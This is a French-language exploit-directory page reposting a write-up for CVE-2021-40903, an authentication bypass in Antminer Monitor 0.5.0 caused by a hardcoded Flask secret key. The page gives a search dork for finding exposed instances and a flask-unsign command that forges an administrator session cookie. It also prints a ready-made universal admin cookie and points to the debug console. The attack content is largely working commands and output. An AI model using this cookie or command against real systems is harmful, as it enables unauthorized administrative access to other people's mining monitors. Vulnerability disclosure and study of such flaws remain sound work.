Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
Outils/GitHubGitHub/vulnz/cve-2021-40903
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Titre de l'exploit : Antminer Monitor 0.5.0 - Contournement d'authentification

CVE: CVE-2021-40903

Date: 09/06/2021

Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 Auteur de l'exploit : CQR.company / Vulnz.

Page d'accueil du fournisseur : https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

Lien du logiciel : https://github.com/anselal/antminer-monitor, https://soulis.tech/

Version : 0.5.0

Testé sur : Windows, Linux, macOS

Le logiciel est couramment utilisé pour la surveillance des antminers et peut facilement être trouvé sur Zoomeye (800) et Shodan (500). Pour l'instant, c'est l'outil de surveillance d'antminers le plus populaire. La vulnérabilité dans Antminer Monitor existe à cause d'une porte dérobée ou d'une erreur de configuration effectuée par le développeur dans le fichier de paramètres du serveur flask.

Le fichier de paramètres contient une chaîne secrète prédéfinie, qui devrait être générée aléatoirement, mais elle est statique dans cette version. antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

La clé secrète est 'super secret key'.

Sur la base de ces informations, nous pouvons fabriquer des cookies de contournement d'autorisation.

En utilisant le logiciel flask-unsign, nous pouvons générer un cookie qui vous donnera un accès administrateur.

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key"

De plus, vous pouvez utiliser ce cookie universel pour accéder à l'interface web de l'application flask.

Ce cookie fonctionne sur tous les systèmes dans le champ 'session'.

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

De plus, DEBUG = True signifie que /console fonctionne, mais nécessite un code PIN.

Télécharger l’outil